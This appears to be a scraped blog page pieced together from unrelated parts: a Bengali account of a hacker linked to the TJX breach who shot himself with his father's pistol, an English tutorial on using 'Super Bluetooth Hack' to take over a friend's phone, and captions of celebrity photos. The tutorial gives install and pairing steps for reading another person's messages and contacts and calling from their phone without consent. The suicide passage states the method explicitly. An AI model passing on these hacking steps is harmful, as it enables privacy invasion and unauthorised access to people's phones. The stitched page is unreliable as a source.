২০০৭ সালে টিজেএক্স নামের একটি কোম্পানীর ওয়েব সাইট বেশ বড় একটা হ্যাকিং এর ঘটনা ঘটে। যার ফলে ওই কোম্পানীর অনেক ক্লাইন্টের ব্যাক্তিগত তথ্য চুরি হয়ে যায়। এছাড়াও বস্টন মার্কেট, বার্নেস এয়ান্ড নোবেল, স্পোর্টস অথরিটি, ফরেভার-২১, অফিস ম্যাক্স এবং ডেভ বাস্টার্স সহ আরো কিছু বড় বড় প্রতিষ্ঠানেও একি ধরনের হ্যাকিং এর ঘটনা ঘটে। যদিও জেমস অস্বীকার করেন যে, তিনি এগুলোর সঙ্গে জড়িত নন, তবুও তাকে বিভিন্ন তদন্তের সম্মুখীন হতে হয়। এরপর তদন্ত কর্মকর্তারা তাদের তদন্তের মাধ্যমে দেখেন যে এই ঘটনাতে জে,জে, নামে অন্য একজন জড়িত। নামের সাথে মিলে যাওয়াতে জেমস তাদের প্রধান লক্ষ্যতে পরিনত হন। এরপর ২০০৮ সালের ১৮ এপ্রিল জেমস এর মৃত দেহ তার বাথরুমে পাওয়া যায়। সে তার বাবার পিস্টল দিয়ে নিজেই নিজের মাথায় গুলি করে আত্মহত্যা করে। হ্যাকিং করার এই ঘটনায় নিজেকে নির্দোষ প্রমান করার আর কোন উপায় না পেয়ে সে আত্মহত্যা করে এবং মৃত্যুর অগে এই নোট রেখে যান,
“     I honestly, honestly had nothing to do with TJX,I have no faith in the 'justice' system. Perhaps my actions today, and this letter, will send a stronger message to the public. Either way, I have lost control over this situation, and this is my only way to regain control.

How to hack cell phone

How to hack cell phone

How to hack your friends mobile phone and make calls/send SMS using the hacked mobile phone.

In this article I will show you how to hack mobile phone with simple software called Super Bluetooth Hack v.1.8. This is a new version of Super Bluetooth Hack for conventional and mobile-based simbian. If you do not know what is a Super Bluetooth Hack, this program through MDM can be used to control other people’s mobile phone. You can control and read information from remote phone via bluetooth or infra, call from phone, read messages & contacts, change profile, restart phone, etc.

Once connected to a another phone via bluetooth you can:

read his messages
read his contacts
change profile
play his ringtone even if phone is on silent
play his songs(in his phone)
restart the phone
switch off the phone
restore factory settings
change ringing volume
And here comes the best, "Call from his phone" it includes all call functions like hold etc.
And much much more ...

How to install:
Download the Super Bluetooth Hack
Unzip the file and send it to your mobile phone.
Install the software in your mobile phone.
Inquire new devices through the software.
When connecting devices use a code 0000
Super Bluetooth Hack

With the program you can do things on the other phone such as:
- read SMS messages
- read contacts
- change profile
- play ringtone (even if phone is on silent)
- play songs
- restart the phone
- turn off the phone
- restore factory settings
- change ringing volume
- call from the other phone (it includes all call functions like hold etc.)

Notes:
1.) When connecting devices use the code 0000
2.) At start of programm on smartphones do not forget to turn on bluetooth before start of the application
3.) You have to download the file with Firefox, because Internet Explorer makes it a .zip file. If you don't want to download Firefox, you have to change the extension of the file from ".zip" to ".jar".

If you downloaded the file as a ".zip" file, here is explained how to change it to a ".jar" file:
With Windows:
1. Go to Start - Computer
2. In the menubar, go to: Tools - Folder Options... (With Windows Vista, you have to push the "Alt" key before you can see the "Tools" menu)
3. Go to "View", and than deselect the mark from "Hide extentions for known file types".
4. Then search for your "SuperBluetoothHack_v108.zip" file. Now change the last part from ".zip" to ".jar", and confirm it.
5. Now you can send it to your phone and open it.

Installation instructions for a Sony Ericsson using a USB cable:
1. Connect your phone with your computer.
2. It mounts as a disk.
3. Drag the file that you have just downloaded (SuperBluetoothHack_v108.jar) to /MSSEMC/Media files/other/ on that disk (=your phone).
4. Disconnect the USB cable from your phone.
5. Go to the folder "Other" on your phone.
6. There is the application. Select it and click "Install".
7. The program is installed on the place you specified. Most likely it's the Applications folder.

Change the language to English:
If the software starts with the language "Slovencina", you can change it to English on this way:
1.If you start the application for the first time you see "Nastavenia" in the title.
2. Go a bit down until you see "Jazyk".
3. Click choose.
4. Select "English".
5. Click "More".
6. Click "Spat".
7. Now the program is in English.

                                                                 ---RUN MADNANI

Some Rare Pics :)

Rare pic Of Mahendra Sing Dhoni

Rare pic Of Katrina Kaif

Rare pic Of Katrina Kaif

Painted By Satyajit Roy



Rare pic Of AMITABH Bachchan

Amitabh bachchan in childhood

Amitabh bachchan in childhood

Amitabh bachchan in childhood

Rare pic of Big b

Rare pic Of AMITABH Bachchan

Rare pic Of AMITABH Bachchan


Childhood pic of Rittick Roshan



Srk in Childhood



Rrabindranath Tagore with Einstein

Rabindranath With Gandhi ji